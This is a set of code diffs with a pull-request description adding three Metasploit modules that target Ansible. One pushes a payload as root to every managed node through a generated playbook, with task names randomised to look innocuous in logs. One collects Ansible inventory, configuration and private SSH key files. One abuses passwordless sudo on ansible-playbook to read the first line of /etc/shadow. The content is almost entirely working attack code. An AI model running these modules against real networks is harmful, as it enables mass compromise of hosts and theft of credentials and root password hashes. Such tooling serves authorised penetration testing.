+        'Platform' => [ 'linux' ],
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://github.com/n0tty/Random-Hacking-Scripts/blob/master/pwnsible.sh'],
+          [ 'URL', 'https://web.archive.org/web/20180220031610/http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1'],
+        ],
+        'DisclosureDate' => '2017-06-12', # pwnsible script but prob way before that
+        'DefaultTarget' => 0,
+        'Passive' => true, # this allows us to get multiple shells calling home
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('ANSIBLE', [true, 'Ansible executable location', '']),
+      OptString.new('ANSIBLEPLAYBOOK', [true, 'Ansible-playbook executable location', '']),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]),
+      OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),
+      OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]),
+      OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ])
+    ]
+  end
+
+  def ansible_exe
+    return @ansible if @ansible
+
+    ['/usr/local/bin/ansible', datastore['ANSIBLE']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @ansible = exec
+    end
+    @ansible
+  end
+
+  def ansible_playbook
+    return @ansible_playbook if @ansible_playbook
+
+    ['/usr/local/bin/ansible-playbook', '/usr/bin/ansible-playbook', datastore['ANSIBLEPLAYBOOK']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @ansible_playbook = exec
+    end
+    @ansible_playbook
+  end
+
+  def module_contents(payload_name)
+    # name is a required field, and gets logged, so randomizing may be a little too obvious, I've opted for just numbers in this case.
+    "- name: Deliver Meterpreter
+  hosts: #{datastore['HOSTS']}
+  remote_user: root
+  tasks:
+    - name: 1
+      ansible.builtin.copy:
+        src: #{datastore['WritableDir']}/#{payload_name}
+        dest: #{datastore['TargetWritableDir']}/#{payload_name}
+    - name: 2
+      ansible.builtin.file:
+        path: #{datastore['TargetWritableDir']}/#{payload_name}
+        owner: root
+        group: root
+        mode: '0777'
+    - name: 3
+      command: #{datastore['TargetWritableDir']}/#{payload_name}
+"
+  end
+
+  def check
+    return CheckCode::Safe('Ansible does not seem to be installed, unable to find ansible executable') if ansible_playbook.nil?
+
+    if writable?(datastore['WritableDir'])
+      vprint_good("#{datastore['WritableDir']} is writable, and ansible executable found")
+      return CheckCode::Vulnerable
+    end
+    CheckCode::Safe("#{datastore['WritableDir']} is not writable")
+  end
+
+  def ping_hosts
+    results = cmd_exec("#{ansible_exe} #{datastore['HOSTS']} -m ping -o")
+    l = store_loot('ansible.ping', 'text/plain', session, results, 'ansible.ping', 'Ansible ping status')
+    print_good("Stored pings to: #{l}")
+    count = 0
+    columns = ['Host', 'Status', 'Ping', 'Changed']
+    table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)
+    # here's a regex with test: https://rubular.com/r/FMHhWx8QlVnidA
+    regex = /(\S+)\s+\|\s+([A-Z]+)\s+=>\s+({.+})$/
+    matches = results.scan(regex)
+
+    matches.each do |match|
+      match[2] = JSON.parse(match[2])
+      table << [match[0], match[1], match[2]['ping'], match[2]['changed']]
+      count += 1 if match[2]['ping'] == 'pong'
+    end
+    print_good(table.to_s) unless table.rows.empty?
+    # give the user a few seconds to cancel if its too many etc
+    print_good("#{count} ansible hosts were pingable, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.")
+    Rex.sleep(10)
+  end
+
+  def exploit
+    # Make sure we can write our exploit and payload to the local system
+    fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']
+    ping_hosts if datastore['CALCULATE']
+
+    payload_name = rand_text_alphanumeric(5..10)
+    module_name = rand_text_alphanumeric(5..10)
+
+    print_status('Creating yaml job to execute')
+    yaml_file = "#{datastore['WritableDir']}/#{module_name}.yaml"
+    write_file(yaml_file, module_contents(payload_name))
+    register_file_for_cleanup(yaml_file)
+    print_status('Writing payload')
+    upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", generate_payload_exe
+    register_file_for_cleanup("#{datastore['WritableDir']}/#{payload_name}")
+    print_status('Executing ansible job')
+    resp = cmd_exec("#{ansible_playbook} #{yaml_file}")
+    l = store_loot('ansible.playbook.log', 'text/plain', session, resp, 'ansible.playbook.log', 'Ansible playbook log')
+    print_good("Stored run logs to: #{l}")
+    # stolen from exploit/multi/handler
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+      Rex::ThreadSafe.sleep(1)
+    end
+  end
+
+  def on_new_session(_session)
+    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
+
+    begin
+      print_warning("Deleting: #{datastore['TargetWritableDir']}/#{payload_name}")
+      cli.fs.file.rm("#{datastore['TargetWritableDir']}/#{payload_name}")
+      print_good("#{datastore['TargetWritableDir']}/#{payload_name} removed")
+    rescue StandardError
+      print_error("Unable to delete: #{datastore['TargetWritableDir']}/#{payload_name}")
+    end
+  end
+
+end

--- a/modules/exploits/linux/local/ansible_node_deployer.rb
+++ b/modules/exploits/linux/local/ansible_node_deployer.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Local
         }
       )
     )
-    register_advanced_options [
+    register_options [
       OptString.new('ANSIBLE', [true, 'Ansible executable location', '']),
       OptString.new('ANSIBLEPLAYBOOK', [true, 'Ansible-playbook executable location', '']),
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

--- a/modules/exploits/linux/local/ansible_node_deployer.rb
+++ b/modules/exploits/linux/local/ansible_node_deployer.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Local
       OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]),
       OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),
       OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]),
-      OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ])
+      OptInt.new('ListenerTimeout', [ true, 'The maximum number of seconds to wait for new sessions', 60 ])
     ]
   end
 
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     return CheckCode::Safe('Ansible does not seem to be installed, unable to find ansible executable') if ansible_playbook_exe.nil?
 
-    CheckCode::Vulnerable('ansible executable found')
+    CheckCode::Appears('ansible playbook executable found')
   end
 
   def ping_hosts_print

--- a/modules/exploits/linux/local/ansible_node_deployer.rb
+++ b/modules/exploits/linux/local/ansible_node_deployer.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Name' => 'Ansible Agent Payload Deployer',
         'Description' => %q{
           This exploit module creates an ansible module for deployment to nodes in the network.
-          It creates a new yaml playbook which copys our payload, chmods it, then runs it on all
+          It creates a new yaml playbook which copies our payload, chmods it, then runs it on all
           targets which have been selected (default all).
         },
         'License' => MSF_LICENSE,
@@ -83,8 +83,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def module_contents(payload_name)
-    # name is a required field, and gets logged, so randomizing may be a little too obvious, I've opted for just numbers in this case.
-    "- name: Deliver Meterpreter
+    # The `name` field in `tasks` is a required field, and it gets logged, so randomizing may be a little too obvious, I've opted for just numbers in this case.
+    "- name: #{Rex::Text.rand_text_numeric(3..6)}
   hosts: #{datastore['HOSTS']}
   remote_user: root
   tasks:
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Local
         path: #{datastore['TargetWritableDir']}/#{payload_name}
         owner: root
         group: root
-        mode: '0777'
+        mode: '0700'
     - name: 3
       command: #{datastore['TargetWritableDir']}/#{payload_name}
 "
@@ -106,24 +106,21 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     return CheckCode::Safe('Ansible does not seem to be installed, unable to find ansible executable') if ansible_playbook.nil?
 
-    if writable?(datastore['WritableDir'])
-      vprint_good("#{datastore['WritableDir']} is writable, and ansible executable found")
-      return CheckCode::Vulnerable
-    end
-    CheckCode::Safe("#{datastore['WritableDir']} is not writable")
+    CheckCode::Vulnerable('ansible executable found')
   end
 
   def ping_hosts
     results = cmd_exec("#{ansible_exe} #{datastore['HOSTS']} -m ping -o")
-    l = store_loot('ansible.ping', 'text/plain', session, results, 'ansible.ping', 'Ansible ping status')
-    print_good("Stored pings to: #{l}")
-    count = 0
+    pings = store_loot('ansible.ping', 'text/plain', session, results, 'ansible.ping', 'Ansible ping status')
+    print_good("Stored pings to: #{pings}")
+
     columns = ['Host', 'Status', 'Ping', 'Changed']
     table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)
     # here's a regex with test: https://rubular.com/r/FMHhWx8QlVnidA
     regex = /(\S+)\s+\|\s+([A-Z]+)\s+=>\s+({.+})$/
     matches = results.scan(regex)
 
+    count = 0
     matches.each do |match|
       match[2] = JSON.parse(match[2])
       table << [match[0], match[1], match[2]['ping'], match[2]['changed']]
@@ -131,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
     print_good(table.to_s) unless table.rows.empty?
     # give the user a few seconds to cancel if its too many etc
-    print_good("#{count} ansible hosts were pingable, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.")
+    print_good("#{count} ansible hosts were pingable, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")
     Rex.sleep(10)
   end
 
@@ -152,8 +149,8 @@ class MetasploitModule < Msf::Exploit::Local
     register_file_for_cleanup("#{datastore['WritableDir']}/#{payload_name}")
     print_status('Executing ansible job')
     resp = cmd_exec("#{ansible_playbook} #{yaml_file}")
-    l = store_loot('ansible.playbook.log', 'text/plain', session, resp, 'ansible.playbook.log', 'Ansible playbook log')
-    print_good("Stored run logs to: #{l}")
+    playbook_log = store_loot('ansible.playbook.log', 'text/plain', session, resp, 'ansible.playbook.log', 'Ansible playbook log')
+    print_good("Stored run logs to: #{playbook_log}")
     # stolen from exploit/multi/handler
     stime = Time.now.to_f
     timeout = datastore['ListenerTimeout'].to_i
@@ -165,6 +162,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def on_new_session(_session)
+    super
     cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
 
     begin

--- a/modules/post/linux/gather/ansible.rb
+++ b/modules/post/linux/gather/ansible.rb
@@ -72,6 +72,10 @@ class MetasploitModule < Msf::Post
 
   def ping_hosts_print
     results = ping_hosts
+    if results.nil?
+      print_error('Unable to parse ping hosts results')
+      return
+    end
 
     columns = ['Host', 'Status', 'Ping', 'Changed']
     table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)

--- a/modules/post/linux/gather/ansible.rb
+++ b/modules/post/linux/gather/ansible.rb
@@ -78,8 +78,8 @@ class MetasploitModule < Msf::Post
 
   def ping_hosts
     results = cmd_exec("#{ansible_exe} #{datastore['HOSTS']} -m ping -o")
-    l = store_loot('ansible.ping', 'text/plain', session, results, 'ansible.ping', 'Ansible ping status')
-    print_good("Stored pings to: #{l}")
+    pings = store_loot('ansible.ping', 'text/plain', session, results, 'ansible.ping', 'Ansible ping status')
+    print_good("Stored pings to: #{pings}")
     columns = ['Host', 'Status', 'Ping', 'Changed']
     table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)
     # here's a regex with test: https://rubular.com/r/FMHhWx8QlVnidA
@@ -96,10 +96,10 @@ class MetasploitModule < Msf::Post
   def conf
     return unless file?(ansible_cfg)
 
-    f = read_file(ansible_cfg)
-    l = store_loot('ansible.cfg', 'text/plain', session, f, 'ansible.cfg', 'Ansible config file')
-    print_good("Stored config to: #{l}")
-    f.lines.each do |line|
+    ansible_config = read_file(ansible_cfg)
+    stored_config = store_loot('ansible.cfg', 'text/plain', session, ansible_config, 'ansible.cfg', 'Ansible config file')
+    print_good("Stored config to: #{stored_config}")
+    ansible_config.lines.each do |line|
       next unless line.start_with?('private_key_file')
 
       file = line.split(' = ')[1].strip
@@ -107,16 +107,16 @@ class MetasploitModule < Msf::Post
       next unless file?(file)
 
       key = read_file(file)
-      l = store_loot('ansible.private.key', 'text/plain', session, key, 'private.key', 'Ansible private key')
-      print_good("Stored private key file to: #{l}")
+      loot = store_loot('ansible.private.key', 'text/plain', session, key, 'private.key', 'Ansible private key')
+      print_good("Stored private key file to: #{loot}")
     end
   end
 
   def hosts_list
     hosts = cmd_exec("#{ansible_inventory} --list")
     hosts = JSON.parse(hosts)
-    l = store_loot('ansible.inventory', 'application/json', session, hosts, 'ansible_inventory.json', 'Ansible inventory')
-    print_good("Stored inventory to: #{l}")
+    inventory = store_loot('ansible.inventory', 'application/json', session, hosts, 'ansible_inventory.json', 'Ansible inventory')
+    print_good("Stored inventory to: #{inventory}")
     columns = ['Host', 'Connection']
     table = Rex::Text::Table.new('Header' => 'Ansible Hosts', 'Indent' => 1, 'Columns' => columns)
     hosts = hosts.dig('_meta', 'hostvars')

--- a/modules/post/linux/gather/ansible.rb
+++ b/modules/post/linux/gather/ansible.rb
@@ -1,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ansible Config Gather',
+        'Description' => %q{
+          This module will grab ansible information including hosts, ping status, and the configuration file.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # Metasploit Module
+        ],
+        'Platform' => ['linux', 'unix'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'References' => [
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('ANSIBLE', [true, 'Ansible executable location', '']),
+        OptString.new('ANSIBLEINVENTORY', [true, 'Ansible-inventory executable location', '']),
+        OptString.new('ANSIBLECFG', [true, 'Ansible config file location', '']),
+        OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]),
+      ], self.class
+    )
+  end
+
+  def ansible_exe
+    return @ansible if @ansible
+
+    ['/usr/local/bin/ansible', datastore['ANSIBLE']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @ansible = exec
+    end
+    @ansible
+  end
+
+  def ansible_inventory
+    return @ansible_inv if @ansible_inv
+
+    ['/usr/local/bin/ansible-inventory', datastore['ANSIBLEINVENTORY']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @ansible_inv = exec
+    end
+    @ansible_inv
+  end
+
+  def ansible_cfg
+    return @ansible_cfg if @ansible_cfg
+
+    ['/etc/ansible/ansible.cfg', datastore['ANSIBLECFG']].each do |f|
+      next unless file?(f)
+
+      @ansible_cfg = f
+    end
+    @ansible_cfg
+  end
+
+  def ping_hosts
+    results = cmd_exec("#{ansible_exe} #{datastore['HOSTS']} -m ping -o")
+    l = store_loot('ansible.ping', 'text/plain', session, results, 'ansible.ping', 'Ansible ping status')
+    print_good("Stored pings to: #{l}")
+    columns = ['Host', 'Status', 'Ping', 'Changed']
+    table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)
+    # here's a regex with test: https://rubular.com/r/FMHhWx8QlVnidA
+    regex = /(\S+)\s+\|\s+([A-Z]+)\s+=>\s+({.+})$/
+    matches = results.scan(regex)
+
+    matches.each do |match|
+      match[2] = JSON.parse(match[2])
+      table << [match[0], match[1], match[2]['ping'], match[2]['changed']]
+    end
+    print_good(table.to_s) unless table.rows.empty?
+  end
+
+  def conf
+    return unless file?(ansible_cfg)
+
+    f = read_file(ansible_cfg)
+    l = store_loot('ansible.cfg', 'text/plain', session, f, 'ansible.cfg', 'Ansible config file')
+    print_good("Stored config to: #{l}")
+    f.lines.each do |line|
+      next unless line.start_with?('private_key_file')
+
+      file = line.split(' = ')[1].strip
+      print_good("Private key file location: #{file}")
+      next unless file?(file)
+
+      key = read_file(file)
+      l = store_loot('ansible.private.key', 'text/plain', session, key, 'private.key', 'Ansible private key')
+      print_good("Stored private key file to: #{l}")
+    end
+  end
+
+  def hosts_list
+    hosts = cmd_exec("#{ansible_inventory} --list")
+    hosts = JSON.parse(hosts)
+    l = store_loot('ansible.inventory', 'application/json', session, hosts, 'ansible_inventory.json', 'Ansible inventory')
+    print_good("Stored inventory to: #{l}")
+    columns = ['Host', 'Connection']
+    table = Rex::Text::Table.new('Header' => 'Ansible Hosts', 'Indent' => 1, 'Columns' => columns)
+    hosts = hosts.dig('_meta', 'hostvars')
+    hosts.each do |host|
+      table << [host[0], host[1]['ansible_connection']]
+    end
+    print_good(table.to_s) unless table.rows.empty?
+  end
+
+  def run
+    fail_with(Failure::NotFound, 'Ansible executable not found') if ansible_exe.nil?
+    hosts_list
+    ping_hosts
+    conf
+  end
+end

--- a/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb
+++ b/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb
@@ -42,6 +42,12 @@ class MetasploitModule < Msf::Post
         OptString.new('FILE', [true, 'File to read the first line of', '/etc/shadow']),
       ], self.class
     )
+
+    register_advanced_options(
+      [
+        OptString.new('FULLOUTPUT', [false, 'Show the full output without cleanup', false]),
+      ], self.class
+    )
   end
 
   def ansible_exe
@@ -91,6 +97,10 @@ class MetasploitModule < Msf::Post
     # root:!::0:::::
     # ^ here
     # we want to take the 2nd to last line.
-    print_good(output.lines[-2].strip)
+    if datastore['FULLOUTPUT']
+      print_good(output)
+    else
+      print_good(output.lines[-2].strip)
+    end
   end
 end

--- a/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb
+++ b/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb
@@ -1,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ansible Playbook Error Message File Reader',
+        'Description' => %q{
+          This module will read the first line of a file based on an error message from ansible-playbook with sudo privileges.
+          ansible-playbook takes a yaml file as input, and if there is an error, such as a non-yaml file, it outputs the line
+          where the error occurs. This can be exploited to read the first line of the file, which we'll typically want to read
+          /etc/shadow to obtain root's hash.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # Metasploit Module
+          'rioasmara'
+        ],
+        'Platform' => ['linux', 'unix'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'References' => [
+          ['URL', 'https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('ANSIBLEPLAYBOOK', [true, 'Ansible-playbook executable location', '']),
+        OptString.new('FILE', [true, 'File to read the first line of', '/etc/shadow']),
+      ], self.class
+    )
+  end
+
+  def ansible_exe
+    return @ansible if @ansible
+
+    ['/usr/local/bin/ansible-playbook', '/usr/bin/ansible-playbook', datastore['ANSIBLEPLAYBOOK']].each do |exec|
+      next unless file?(exec)
+      next unless executable?(exec)
+
+      @ansible = exec
+    end
+    @ansible
+  end
+
+  def run
+    fail_with(Failure::NotFound, 'Ansible-playbook executable not found') if ansible_exe.nil?
+    fail_with(Failure::NotFound, "Target file to read not found: #{datastore['file']}") unless file?(datastore['FILE'])
+
+    vprint_status('Checking sudo')
+    # check we can sudo
+    cmd = 'sudo -n -l'
+    print_status "Executing: #{cmd}"
+    output = cmd_exec(cmd).to_s
+
+    if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
+      print_error('Current user could not execute sudo -l')
+      fail_with(Failure::NoAccess, 'Unable to execute the sudo command')
+    end
+
+    can_sudo_playbook = false
+    output.lines.each do |line|
+      next unless line.include? 'ansible-playbook'
+      next unless line.include? 'NOPASSWD'
+
+      can_sudo_playbook = true
+    end
+    fail_with(Failure::NoAccess, "ansible-playbook can't be run with a passwordless sudo") unless can_sudo_playbook
+
+    cmd = "sudo -n #{ansible_exe} #{datastore['FILE']}"
+    print_status "Executing: #{cmd}"
+    output = cmd_exec(cmd).to_s
+
+    # output will look similar to this:
+    # The offending line appears to be:
+    #
+    #
+    # root:!::0:::::
+    # ^ here
+    # we want to take the 2nd to last line.
+    print_good(output.lines[-2].strip)
+  end
+end


### PR DESCRIPTION
This PR adds 3 modules for ansible:

1. a post module to gather info, configs etc
2. a post module which, when configured w/ passwordless `sudo` permissions, can read the first line of a file (like `/etc/shadow`)
3. an exploit module which can deploy a payload to all the nodes in the network

This is part 2 of my new Raining Shells series ![raining blood](https://media1.tenor.com/m/C7RUc1MyyDcAAAAC/slayer-slayer-fan.gif)

## Verification

See individual markdowns for instructions